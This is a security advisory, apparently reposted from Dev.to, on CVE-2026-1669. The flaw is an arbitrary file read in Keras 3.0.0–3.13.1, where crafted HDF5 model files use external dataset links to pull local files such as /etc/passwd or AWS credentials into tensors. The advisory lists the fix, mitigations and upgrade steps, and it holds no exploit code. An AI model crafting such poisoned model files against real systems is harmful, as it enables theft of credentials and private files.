CVE-2026-1669: Model Poisoning: Turning Keras Weights into Weaponized File Readers
Source: Dev.to
Model Poisoning: Turning Keras Weights into Weaponized File Readers
Vulnerability ID: CVE-2026-1669
CVSS Score: 7.1
Published: 2026-02-18
A high‑severity arbitrary file read vulnerability in the Keras machine‑learning library allows attackers to exfiltrate sensitive local files (e.g., /etc/passwd or AWS credentials) by embedding “External Storage” links within malicious HDF5 model files. This affects Keras versions 3.0.0 through 3.13.1.
TL;DR
Keras blindly trusts HDF5 external datasets when loading models. An attacker can craft a .keras file where the model weights are pointers to local files on the victim’s machine. When the model is loaded, the contents of those files are read into memory as tensors.
⚠️ Exploit Status: Proof‑of‑Concept (PoC)
Technical Details
- CWE ID: CWE‑73 (External Control of File Name or Path)
- CVSS v4.0: 7.1 (High)
- Attack Vector: Network / Local
- EPSS Score: 0.00039
- Exploit Maturity: PoC
- Affected Component:
keras.src.saving.saving_lib
Affected Systems
- Keras 3.0.0
- Keras 3.1.0
- Keras 3.13.1
- Any Python application using Keras to load untrusted models
Version range: >= 3.0.0, < 3.13.2 (fixed in 3.13.2)
Code Analysis
Commit: 8a37f9d – “Fix checking for external dataset in H5 file”
if dataset.external:
raise ValueError("Not allowed: H5 file Dataset with external links")
Exploit Details
- Researcher: Giuseppe Massaro – Original PoC demonstrating local file inclusion via HDF5 external storage.
Mitigation Strategies
- Input Validation – Reject or sanitize external dataset references.
- Sandboxing – Run model loading in a restricted environment with limited filesystem access.
- Dependency Management – Keep Keras up‑to‑date.
Remediation Steps
- Upgrade Keras to 3.13.2 or later.
- Audit existing model pipelines to ensure untrusted models are not loaded with high privileges.
- Implement pre‑loading checks (e.g., using
h5dump) to scan forEXTERNAL_FILEheaders in HDF5 files.